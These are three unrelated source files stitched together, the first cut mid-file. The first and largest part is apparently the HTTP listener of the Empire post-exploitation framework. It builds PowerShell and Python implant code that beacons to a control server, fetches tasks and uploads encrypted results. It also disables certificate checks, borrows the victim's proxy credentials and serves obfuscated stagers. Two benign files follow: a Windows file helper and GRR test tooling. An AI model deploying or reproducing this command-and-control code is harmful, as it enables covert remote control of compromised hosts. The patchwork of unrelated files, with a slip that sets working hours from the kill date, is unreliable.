'defaultResponse = base64.b64decode("%s")' % (b64DefaultResponse.decode("UTF-8")))
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate))
if workingHours != "":
code = code.replace('workingHours = ""', 'workingHours = "%s"' % (killDate))
return code
else:
print(helpers.color(
"[!] listeners/http generate_agent(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
if language:
if language.lower() == 'powershell':
updateServers = """
$Script:ControlServers = @("%s");
$Script:ServerIndex = 0;
""" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
getTask = """
$script:GetTask = {
try {
if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) {
# meta 'TASKING_REQUEST' : 4
$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4
$RoutingCookie = [Convert]::ToBase64String($RoutingPacket)
# build the web request object
$""" + helpers.generate_random_script_var_name("wc") + """ = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = $Script:Proxy;
}
$""" + helpers.generate_random_script_var_name("wc") + """.Headers.Add("User-Agent",$script:UserAgent)
$script:Headers.GetEnumerator() | % {$""" + helpers.generate_random_script_var_name(
"wc") + """.Headers.Add($_.Name, $_.Value)}
$""" + helpers.generate_random_script_var_name(
"wc") + """.Headers.Add("Cookie",\"""" + self.session_cookie + """session=$RoutingCookie")
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$result = $""" + helpers.generate_random_script_var_name("wc") + """.DownloadData($Script:ControlServers[$Script:ServerIndex] + $taskURI)
$result
}
}
catch [Net.WebException] {
$script:MissedCheckins += 1
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
"""
sendMessage = """
$script:SendMessage = {
param($Packets)
if($Packets) {
# build and encrypt the response packet
$EncBytes = Encrypt-Bytes $Packets
# build the top level RC4 "routing packet"
# meta 'RESULT_POST' : 5
$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5
if($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) {
# build the web request object
$""" + helpers.generate_random_script_var_name("wc") + """ = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = $Script:Proxy;
}
$""" + helpers.generate_random_script_var_name("wc") + """.Headers.Add('User-Agent', $Script:UserAgent)
$Script:Headers.GetEnumerator() | ForEach-Object {$""" + helpers.generate_random_script_var_name(
"wc") + """.Headers.Add($_.Name, $_.Value)}
try {
# get a random posting URI
$taskURI = $Script:TaskURIs | Get-Random
$response = $""" + helpers.generate_random_script_var_name("wc") + """.UploadData($Script:ControlServers[$Script:ServerIndex]+$taskURI, 'POST', $RoutingPacket);
}
catch [System.Net.WebException]{
# exception posting data...
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
}
}
"""
return updateServers + getTask + sendMessage
elif language.lower() == 'python':
updateServers = "server = '%s'\n" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "hasattr(ssl, '_create_unverified_context') and ssl._create_unverified_context() or None"
sendMessage = """
def send_message(packets=None):
# Requests a tasking or posts data to a randomized tasking URI.
# If packets == None, the agent GETs a tasking from the control server.
# If packets != None, the agent encrypts the passed packets and
# POSTs the data to the control server.
global missedCheckins
global server
global headers
global taskURIs
data = None
if packets:
data = ''.join(packets.decode('latin-1'))
# aes_encrypt_then_hmac is in stager.py
encData = aes_encrypt_then_hmac(key, data)
data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData)
else:
# if we're GETing taskings, then build the routing packet to stuff info a cookie first.
# meta TASKING_REQUEST = 4
routingPacket = build_routing_packet(stagingKey, sessionID, meta=4)
b64routingPacket = base64.b64encode(routingPacket).decode('UTF-8')
headers['Cookie'] = \"""" + self.session_cookie + """session=%s" % (b64routingPacket)
taskURI = random.sample(taskURIs, 1)[0]
requestUri = server + taskURI
try:
data = (urllib.urlopen(urllib.Request(requestUri, data, headers))).read()
return ('200', data)
except urllib.HTTPError as HTTPError:
# if the server is reached, but returns an error (like 404)
missedCheckins = missedCheckins + 1
#if signaled for restaging, exit.
if HTTPError.code == 401:
sys.exit(0)
return (HTTPError.code, '')
except urllib.URLError as URLerror:
# if the server cannot be reached
missedCheckins = missedCheckins + 1
return (URLerror.reason, '')
return ('', '')
"""
return updateServers + sendMessage
else:
print(helpers.color(
"[!] listeners/http generate_comms(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
else:
print(helpers.color('[!] listeners/http generate_comms(): no language specified!'))
def start_server(self, listenerOptions):
"""
Threaded function that actually starts up the Flask server.
"""
# make a copy of the currently set listener options for later stager/agent generation
listenerOptions = copy.deepcopy(listenerOptions)
# suppress the normal Flask output
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
bindIP = listenerOptions['BindIP']['Value']
host = listenerOptions['Host']['Value']
port = listenerOptions['Port']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
stagerURI = listenerOptions['StagerURI']['Value']
userAgent = self.options['UserAgent']['Value']
listenerName = self.options['Name']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
app = Flask(__name__)
self.app = app
@app.route('/download/<stager>')
def send_stager(stager):
if 'po' in stager:
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=False,
userAgent=userAgent, proxy=proxy,
proxyCreds=proxyCreds)
return launcher
elif 'py' in stager:
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python', encode=False,
userAgent=userAgent, proxy=proxy,
proxyCreds=proxyCreds)
return launcher
else:
return make_response(self.default_response(), 404)
@app.before_request
def check_ip():
"""
Before every request, check if the IP address is allowed.
"""
if not self.mainMenu.agents.is_ip_allowed(request.remote_addr):
listenerName = self.options['Name']['Value']
message = "[!] {} on the blacklist/not on the whitelist requested resource".format(request.remote_addr)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 404)
@app.after_request
def change_header(response):
"Modify the headers response server."
headers = listenerOptions['Headers']['Value']
for key in headers.split("|"):
value = key.split(":")
response.headers[value[0]] = value[1]
return response
@app.after_request
def add_proxy_headers(response):
"Add HTTP headers to avoid proxy caching."
response.headers['Cache-Control'] = "no-cache, no-store, must-revalidate"
response.headers['Pragma'] = "no-cache"
response.headers['Expires'] = "0"
return response
@app.route('/')
@app.route('/index.html')
def serve_index():
"""
Return default server web page if user navigates to index.
"""
static_dir = self.mainMenu.installPath + "data/misc/"
return make_response(self.index_page(), 200)
@app.route('/welcome.png')
def serve_index_helper():
"""
Serves image loaded by index page.
"""
static_dir = self.mainMenu.installPath + "data/misc/"
return send_from_directory(static_dir, 'welcome.png')
@app.route('/<path:request_uri>', methods=['GET'])
def handle_get(request_uri):
"""
Handle an agent GET request.
This is used during the first step of the staging process,
and when the agent requests taskings.
"""
clientIP = request.remote_addr
listenerName = self.options['Name']['Value']
message = "[*] GET request for {}/{} from {}".format(request.host, request_uri, clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
routingPacket = None
cookie = request.headers.get('Cookie')
if cookie and cookie != '':
try:
# see if we can extract the 'routing packet' from the specified cookie location
# NOTE: this can be easily moved to a paramter, another cookie value, etc.
if self.session_cookie in cookie:
listenerName = self.options['Name']['Value']
message = "[*] GET cookie value from {} : {}".format(clientIP, cookie)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
cookieParts = cookie.split(';')
for part in cookieParts:
if part.startswith(self.session_cookie):
base64RoutingPacket = part[part.find('=') + 1:]
# decode the routing packet base64 value in the cookie
routingPacket = base64.b64decode(base64RoutingPacket)
except Exception as e:
routingPacket = None
pass
if routingPacket:
# parse the routing packet and process the results
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, routingPacket, listenerOptions,
clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if isinstance(results, str):
results = results.encode('UTF-8')
if results == b'STAGE0':
# handle_agent_data() signals that the listener should return the stager.ps1 code
# step 2 of negotiation -> return stager.ps1 (stage 1)
listenerName = self.options['Name']['Value']
message = "\n[*] Sending {} stager (stage 1) to {}".format(language, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
stage = self.generate_stager(language=language, listenerOptions=listenerOptions,
obfuscate=self.mainMenu.obfuscate,
obfuscationCommand=self.mainMenu.obfuscateCommand)
return make_response(stage, 200)
elif results.startswith(b'ERROR:'):
listenerName = self.options['Name']['Value']
message = "[!] Error from agents.handle_agent_data() for {} from {}: {}".format(
request_uri, clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
if b'not in cache' in results:
# signal the client to restage
print(helpers.color("[*] Orphaned agent from %s, signaling restaging" % (clientIP)))
return make_response(self.default_response(), 401)
else:
return make_response(self.default_response(), 200)
else:
# actual taskings
listenerName = self.options['Name']['Value']
message = "[*] Agent from {} retrieved taskings".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(results, 200)
else:
# dispatcher.send("[!] Results are None...", sender='listeners/http')
return make_response(self.default_response(), 200)
else:
return make_response(self.default_response(), 200)
else:
listenerName = self.options['Name']['Value']
message = "[!] {} requested by {} with no routing packet.".format(request_uri, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 200)
@app.route('/<path:request_uri>', methods=['POST'])
def handle_post(request_uri):
"""
Handle an agent POST request.
"""
stagingKey = listenerOptions['StagingKey']['Value']
clientIP = request.remote_addr
requestData = request.get_data()
listenerName = self.options['Name']['Value']
message = "[*] POST request data length from {} : {}".format(clientIP, len(requestData))
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
# the routing packet should be at the front of the binary request.data
# NOTE: this can also go into a cookie/etc.
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, requestData, listenerOptions, clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if isinstance(results, str):
results = results.encode('UTF-8')
if results:
if results.startswith(b'STAGE2'):
# TODO: document the exact results structure returned
if ':' in clientIP:
clientIP = '[' + str(clientIP) + ']'
sessionID = results.split(b' ')[1].strip().decode('UTF-8')
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
listenerName = self.options['Name']['Value']
message = "[*] Sending agent (stage 2) to {} at {}".format(sessionID, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
hopListenerName = request.headers.get('Hop-Name')
try:
hopListener = helpers.get_listener_options(hopListenerName)
tempListenerOptions = copy.deepcopy(listenerOptions)
tempListenerOptions['Host']['Value'] = hopListener['Host']['Value']
except TypeError:
tempListenerOptions = listenerOptions
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
agentCode = self.generate_agent(language=language, listenerOptions=tempListenerOptions,
obfuscate=self.mainMenu.obfuscate,
obfuscationCommand=self.mainMenu.obfuscateCommand)
encryptedAgent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
# TODO: wrap ^ in a routing packet?
return make_response(encryptedAgent, 200)
elif results[:10].lower().startswith(b'error') or results[:10].lower().startswith(b'exception'):
listenerName = self.options['Name']['Value']
message = "[!] Error returned for results by {} : {}".format(clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 404)
elif results.startswith(b'VALID'):
listenerName = self.options['Name']['Value']
message = "[*] Valid results returned by {}".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 200)
else:
return make_response(results, 200)
else:
return make_response(self.default_response(), 404)
else:
return make_response(self.default_response(), 404)
try:
certPath = listenerOptions['CertPath']['Value']
host = listenerOptions['Host']['Value']
if certPath.strip() != '' and host.startswith('https'):
certPath = os.path.abspath(certPath)
pyversion = sys.version_info
# support any version of tls
pyversion = sys.version_info
if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
proto = ssl.PROTOCOL_TLS
elif pyversion[0] >= 3:
proto = ssl.PROTOCOL_TLS
else:
proto = ssl.PROTOCOL_SSLv23
context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
cipherlist_tls12 = ["ECDHE-RSA-AES256-GCM-SHA384", "ECDHE-RSA-AES128-GCM-SHA256", "ECDHE-RSA-AES256-SHA384", "AES256-SHA256", "AES128-SHA256"]
cipherlist_tls10 = ["ECDHE-RSA-AES256-SHA"]
selectciph = random.choice(cipherlist_tls12)+':'+random.choice(cipherlist_tls10)
context.set_ciphers(selectciph)
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
app.run(host=bindIP, port=int(port), threaded=True)
except Exception as e:
print(helpers.color("[!] Listener startup on port %s failed: %s " % (port, e)))
listenerName = self.options['Name']['Value']
message = "[!] Listener startup on port {} failed: {}".format(port, e)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
def start(self, name=''):
"""
Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
if name and name != '':
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
else:
name = listenerOptions['Name']['Value']
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print(helpers.color("[!] Killing listener '%s'" % (name)))
self.threads[name].kill()
else:
print(helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value'])))
self.threads[self.options['Name']['Value']].kill()
def generate_cookie(self):
"""
Generate Cookie
"""
chars = string.ascii_letters
cookie = helpers.random_string(random.randint(6, 16), charset=chars)
return cookie
|
helper.py
|
# -*- coding: utf-8 -*-
import os
from warnings import warn
import ctypes
import win32ui
from threading import Barrier, Thread
import contextlib
import shutil
import tempfile
#%%
def lock_until_file_is_safe(filename):
opened = False
while not opened:
try:
with open(filename):
opened=True
except (FileNotFoundError, PermissionError):
pass
return True
def lock_until_files_are_safe(filenames):
def lock(f, b):
lock_until_file_is_safe(f)
b.wait()
barrier = Barrier(len(filenames)+1)
for filename in filenames:
t = Thread(target=lock, args=(filename, barrier, ))
t.start()
barrier.wait()
def file_exists(path):
return os.path.exists(path)
def delete_file(fname):
return os.remove(fname)
def assert_file_exists(path):
try:
assert(file_exists)
except AssertionError as e:
print('{0} was not found'.format(path))
raise e
return True
def is_file(filename: str, ext: str) -> (bool, str):
cur_ext = os.path.splitext(filename)[1]
if not cur_ext == ext:
warn('''Filename does not end in {0}. \r
Warning: I change extension to {0}'''.format(ext))
return False, filename.replace(cur_ext, ext)
else:
return True, filename
#%%
def find_file(name:str, path:str=None):
'''finds and returns the path to a file with given name
args
----
name:str
name of the file to search
path:str
folder to start looking, defaults to root (e.g. C:\\ or \)
returns
-------
path:str
path to file with given name
'''
if path is None:
path = os.path.abspath(os.sep)
for root, dirs, files in os.walk(path):
if name in files:
return os.path.join(root, name)
#%%
def list_all_window_titles():
EnumWindows = ctypes.windll.user32.EnumWindows
EnumWindowsProc = ctypes.WINFUNCTYPE(ctypes.c_bool, ctypes.POINTER(ctypes.c_int), ctypes.POINTER(ctypes.c_int))
GetWindowText = ctypes.windll.user32.GetWindowTextW
GetWindowTextLength = ctypes.windll.user32.GetWindowTextLengthW
IsWindowVisible = ctypes.windll.user32.IsWindowVisible
titles = []
def foreach_window(hwnd, lParam):
if IsWindowVisible(hwnd):
length = GetWindowTextLength(hwnd)
buff = ctypes.create_unicode_buffer(length + 1)
GetWindowText(hwnd, buff, length + 1)
titles.append(buff.value)
return True
EnumWindows(EnumWindowsProc(foreach_window), 0)
return titles
def window_exists(classname):
try:
win32ui.FindWindow(None, classname)
except win32ui.error:
return False
else:
return True
def assert_window_exists(window_title):
try:
assert(window_exists(window_title))
except AssertionError as e:
print('{0} was not found'.format(window_title))
raise e
return True
# %%
@contextlib.contextmanager
def cd(newdir, cleanup=lambda: True):
prevdir = os.getcwd()
os.chdir(os.path.expanduser(newdir))
try:
yield
finally:
os.chdir(prevdir)
cleanup()
@contextlib.contextmanager
def tempdir():
dirpath = tempfile.mkdtemp()
def cleanup():
shutil.rmtree(dirpath)
with cd(dirpath, cleanup):
yield dirpath
#%%
def make_library(pathdir:str):
d = {}
for fname in os.listdir(pathdir):
if os.path.splitext(fname)[1] =='.stm':
key = os.path.splitext(fname)[0]
val = os.path.join(pathdir, fname)
print(f'Create {key} linking to {val}')
d[key] = val
return d
|
self_contained_components.py
|
#!/usr/bin/env python
# Lint as: python3
"""Functions to run individual GRR components during self-contained testing."""
import atexit
import collections
import os
import platform
import shutil
import signal
import subprocess
import sys
import tempfile
import threading
import time
from typing import Dict, Iterable, List, Optional, Union, Text
import portpicker
from google.protobuf import text_format
from grr_response_core.lib import package
from grr_response_test.lib import api_helpers
from fleetspeak.src.client.daemonservice.proto.fleetspeak_daemonservice import config_pb2 as daemonservice_config_pb2
from fleetspeak.src.client.generic.proto.fleetspeak_client_generic import config_pb2 as client_config_pb2
from fleetspeak.src.common.proto.fleetspeak import system_pb2
from fleetspeak.src.config.proto.fleetspeak_config import config_pb2
from fleetspeak.src.server.grpcservice.proto.fleetspeak_grpcservice import grpcservice_pb2
from fleetspeak.src.server.proto.fleetspeak_server import server_pb2
from fleetspeak.src.server.proto.fleetspeak_server import services_pb2
ComponentOptions = Dict[str, Union[int, str]]
class Error(Exception):
"""Module-specific base error class."""
class ConfigInitializationError(Error):
"""Raised when a self-contained config can't be written."""
def _ComponentOptionsToArgs(options: Optional[ComponentOptions]) -> List[str]:
if options is None:
return []
args = []
for k, v in options.items():
args.extend(["-p", "%s=%s" % (k, v)])
return args
def _GetServerComponentArgs(config_path: str) -> List[str]:
"""Returns a set of command line arguments for server components.
Args:
config_path: Path to a config path generated by
self_contained_config_writer.
Returns:
An iterable with command line arguments to use.
"""
primary_config_path = package.ResourcePath(
"grr-response-core", "install_data/etc/grr-server.yaml")
secondary_config_path = package.ResourcePath(
"grr-response-test", "grr_response_test/test_data/grr_test.yaml")
return [
"--config",
primary_config_path,
"--secondary_configs",
",".join([secondary_config_path, config_path]),
"-p",
"Monitoring.http_port=%d" % portpicker.pick_unused_port(),
"-p",
"AdminUI.webauth_manager=NullWebAuthManager",
]
def _GetRunEndToEndTestsArgs(
client_id,
server_config_path,
tests: Optional[Iterable[str]] = None,
manual_tests: Optional[Iterable[str]] = None) -> List[str]:
"""Returns arguments needed to configure run_end_to_end_tests process.
Args:
client_id: String with a client id pointing to an already running client.
server_config_path: Path to the server configuration file.
tests: (Optional) List of tests to run.
manual_tests: (Optional) List of manual tests to not skip.
Returns:
An iterable with command line arguments.
"""
port = api_helpers.GetAdminUIPortFromConfig(server_config_path)
api_endpoint = "http://localhost:%d" % port
args = [
"--api_endpoint",
api_endpoint,
"--api_user",
"admin",
"--api_password",
"admin",
"--client_id",
client_id,
"--ignore_test_context",
"True",
]
if tests is not None:
args += ["--run_only_tests", ",".join(tests)]
if manual_tests is not None:
args += ["--manual_tests", ",".join(manual_tests)]
return args
def _StartBinary(binary_path: str, args: List[str]) -> subprocess.Popen:
"""Starts a new process with a given binary and args.
Started subprocess will be killed automatically on exit.
Args:
binary_path: A binary to run.
args: An iterable with program arguments (not containing the program
executable).
Returns:
Popen object corresponding to a started process.
"""
popen_args = [binary_path] + args
print("Starting binary: " + " ".join(popen_args))
process = subprocess.Popen(
popen_args, bufsize=0, stdout=None, stderr=subprocess.STDOUT)
def KillOnExit():
if process.poll() is None:
process.kill()
process.wait()
atexit.register(KillOnExit)
return process
def _StartComponent(main_package: str, args: List[str]) -> subprocess.Popen:
"""Starts a new process with a given component.
This starts a Python interpreter with a "-u" argument (to turn off output
buffering) and with a "-m" argument followed by the main package name, thus
effectively executing the main() function of a given package.
Args:
main_package: Main package path.
args: An iterable with program arguments (not containing the program
executable).
Returns:
Popen object corresponding to a started process.
"""
popen_args = [sys.executable, "-u", "-m", main_package] + args
print("Starting %s component: %s" % (main_package, " ".join(popen_args)))
process = subprocess.Popen(
popen_args, bufsize=0, stdout=None, stderr=subprocess.STDOUT)
print("Component %s pid: %d" % (main_package, process.pid))
def KillOnExit():
if process.poll() is None:
print("Killing %s." % main_package)
process.kill()
process.wait()
atexit.register(KillOnExit)
return process
GRRConfigs = collections.namedtuple("GRRConfigs", [
"server_config",
"client_config",
])
def InitGRRConfigs(mysql_database: str,
mysql_username: Optional[str] = None,
mysql_password: Optional[str] = None,
logging_path: Optional[str] = None,
osquery_path: Optional[str] = None,
with_fleetspeak: bool = False) -> GRRConfigs:
"""Initializes server and client config files."""
# Create 2 temporary files to contain server and client configuration files
# that we're about to generate.
#
# TODO(user): migrate to TempFilePath as soon grr.test_lib is moved to
# grr_response_test.
fd, built_server_config_path = tempfile.mkstemp(".yaml")
os.close(fd)
print("Using temp server config path: %s" % built_server_config_path)
fd, built_client_config_path = tempfile.mkstemp(".yaml")
os.close(fd)
print("Using temp client config path: %s" % built_client_config_path)
def CleanUpConfigs():
os.remove(built_server_config_path)
os.remove(built_client_config_path)
atexit.register(CleanUpConfigs)
# Generate server and client configs.
config_writer_flags = [
"--dest_server_config_path",
built_server_config_path,
"--dest_client_config_path",
built_client_config_path,
"--config_mysql_database",
mysql_database,
]
if mysql_username is not None:
config_writer_flags.extend(["--config_mysql_username", mysql_username])
if mysql_password is not None:
config_writer_flags.extend(["--config_mysql_password", mysql_password])
if logging_path is not None:
config_writer_flags.extend(["--config_logging_path", logging_path])
if osquery_path is not None:
config_writer_flags.extend(["--config_osquery_path", osquery_path])
if with_fleetspeak:
config_writer_flags.extend(["--config_with_fleetspeak"])
p = _StartComponent(
"grr_response_test.lib.self_contained_config_writer",
config_writer_flags)
if p.wait() != 0:
raise ConfigInitializationError("ConfigWriter execution failed: {}".format(
p.returncode))
return GRRConfigs(built_server_config_path, built_client_config_path)
FleetspeakConfigs = collections.namedtuple("FleetspeakConfigs", [
"server_components_config",
"server_services_config",
"client_config",
])
def InitFleetspeakConfigs(
grr_configs: GRRConfigs,
mysql_database: str,
mysql_username: Optional[str] = None,
mysql_password: Optional[str] = None) -> FleetspeakConfigs:
"""Initializes Fleetspeak server and client configs."""
fs_frontend_port, fs_admin_port = api_helpers.GetFleetspeakPortsFromConfig(
grr_configs.server_config)
mysql_username = mysql_username or ""
mysql_password = mysql_password or ""
temp_root = tempfile.mkdtemp(suffix="_fleetspeak")
def TempPath(*args):
return os.path.join(temp_root, *args)
cp = config_pb2.Config(configuration_name="Self-contained testing")
cp.components_config.mysql_data_source_name = "%s:%s@tcp(127.0.0.1:3306)/%s" % (
mysql_username, mysql_password, mysql_database)
cp.components_config.https_config.listen_address = "localhost:%d" % portpicker.pick_unused_port(
)
# TODO(user): Use streaming connections by default. At the moment
# a few tests are failing with MySQL errors when streaming is used.
cp.components_config.https_config.disable_streaming = True
cp.components_config.admin_config.listen_address = ("localhost:%d" %
fs_admin_port)
cp.public_host_port.append(cp.components_config.https_config.listen_address)
cp.server_component_configuration_file = TempPath("server.config")
cp.trusted_cert_file = TempPath("trusted_cert.pem")
cp.trusted_cert_key_file = TempPath("trusted_cert_key.pem")
cp.server_cert_file = TempPath("server_cert.pem")
cp.server_cert_key_file = TempPath("server_cert_key.pem")
cp.linux_client_configuration_file = TempPath("linux_client.config")
cp.windows_client_configuration_file = TempPath("windows_client.config")
cp.darwin_client_configuration_file = TempPath("darwin_client.config")
built_configurator_config_path = TempPath("configurator.config")
with open(built_configurator_config_path, mode="w", encoding="utf-8") as fd:
fd.write(text_format.MessageToString(cp))
p = _StartBinary(
"fleetspeak-config",
["--logtostderr", "--config", built_configurator_config_path])
if p.wait() != 0:
raise ConfigInitializationError(
"fleetspeak-config execution failed: {}".format(p.returncode))
# Adjust client config.
with open(
cp.linux_client_configuration_file, mode="r", encoding="utf-8") as fd:
conf_content = fd.read()
conf = text_format.Parse(conf_content, client_config_pb2.Config())
conf.filesystem_handler.configuration_directory = temp_root
conf.filesystem_handler.state_file = TempPath("client.state")
with open(
cp.linux_client_configuration_file, mode="w", encoding="utf-8") as fd:
fd.write(text_format.MessageToString(conf))
# Write client services configuration.
service_conf = system_pb2.ClientServiceConfig(name="GRR", factory="Daemon")
payload = daemonservice_config_pb2.Config()
payload.argv.extend([
sys.executable, "-u", "-m",
"grr_response_client.grr_fs_client",
"--config", grr_configs.client_config
])
# TODO(user): remove this condition when Fleetspeak is used as a nanny
# on all platforms.
if platform.system() == "Windows":
payload.monitor_heartbeats = True
payload.heartbeat_unresponsive_grace_period_seconds = 45
payload.heartbeat_unresponsive_kill_period_seconds = 15
service_conf.config.Pack(payload)
os.mkdir(TempPath("textservices"))
with open(
TempPath("textservices", "GRR.textproto"), mode="w",
encoding="utf-8") as fd:
fd.write(text_format.MessageToString(service_conf))
# Server services configuration.
service_config = services_pb2.ServiceConfig(name="GRR", factory="GRPC")
grpc_config = grpcservice_pb2.Config(
target="localhost:%d" % fs_frontend_port, insecure=True)
service_config.config.Pack(grpc_config)
server_conf = server_pb2.ServerConfig(services=[service_config])
server_conf.broadcast_poll_time.seconds = 1
built_server_services_config_path = TempPath("server.services.config")
with open(
built_server_services_config_path, mode="w", encoding="utf-8") as fd:
fd.write(text_format.MessageToString(server_conf))
return FleetspeakConfigs(cp.server_component_configuration_file,
built_server_services_config_path,
cp.linux_client_configuration_file)
def StartServerProcesses(
grr_configs: GRRConfigs,
fleetspeak_configs: Optional[FleetspeakConfigs] = None,
) -> List[subprocess.Popen]:
"""Starts GRR server processes (optionally behind Fleetspeak frontend)."""
def Args():
return _GetServerComponentArgs(grr_configs.server_config)
if fleetspeak_configs is None:
return [
_StartComponent(
"grr_response_server.gui.admin_ui",
Args()),
_StartComponent(
"grr_response_server.bin.frontend",
Args()),
_StartComponent(
"grr_response_server.bin.worker",
Args()),
]
else:
return [
_StartBinary("fleetspeak-server", [
"-logtostderr",
"-components_config",
fleetspeak_configs.server_components_config,
"-services_config",
fleetspeak_configs.server_services_config,
]),
_StartComponent(
"grr_response_server.bin.fleetspeak_frontend",
Args()),
_StartComponent(
"grr_response_server.gui.admin_ui",
Args()),
_StartComponent(
"grr_response_server.bin.worker",
Args()),
]
def StartClientProcess(grr_configs: GRRConfigs,
fleetspeak_configs: Optional[FleetspeakConfigs] = None,
verbose: bool = False) -> subprocess.Popen:
"""Starts a GRR client or Fleetspeak client configured to run GRR."""
if fleetspeak_configs is None:
return _StartComponent(
"grr_response_client.client",
["--config", grr_configs.client_config] +
(["--verbose"] if verbose else []))
else:
return _StartBinary("fleetspeak-client", [
"-logtostderr",
"-std_forward",
"-config",
fleetspeak_configs.client_config,
])
def RunEndToEndTests(client_id: str,
server_config_path: str,
tests: Optional[Iterable[str]] = None,
manual_tests: Optional[Iterable[str]] = None):
"""Runs end to end tests on a given client."""
p = _StartComponent(
"grr_response_test.run_end_to_end_tests",
_GetServerComponentArgs(server_config_path) + _GetRunEndToEndTestsArgs(
client_id, server_config_path, tests=tests,
manual_tests=manual_tests))
if p.wait() != 0:
raise RuntimeError("RunEndToEndTests execution failed.")
def RunBuildTemplate(server_config_path: str,
component_options: Optional[ComponentOptions] = None,
version_ini: Optional[str] = None) -> str:
"""Runs end to end tests on a given client."""
output_dir = tempfile.mkdtemp()
def CleanUpTemplate():
shutil.rmtree(output_dir)
atexit.register(CleanUpTemplate)
options = dict(component_options or {})
if version_ini:
fd, version_ini_path = tempfile.mkstemp(".ini")
try:
os.write(fd, version_ini.encode("ascii"))
finally:
os.close(fd)
options["ClientBuilder.version_ini_path"] = version_ini_path
p = _StartComponent(
"grr_response_client_builder.client_build",
_GetServerComponentArgs(server_config_path) +
_ComponentOptionsToArgs(options) + ["build", "--output", output_dir])
if p.wait() != 0:
raise RuntimeError("RunBuildTemplate execution failed.")
return os.path.join(output_dir, os.listdir(output_dir)[0])
def RunRepackTemplate(
server_config_path: str,
template_path: str,
component_options: Optional[ComponentOptions] = None) -> str:
"""Runs 'grr_client_builder repack' to repack a template."""
output_dir = tempfile.mkdtemp()
def CleanUpInstaller():
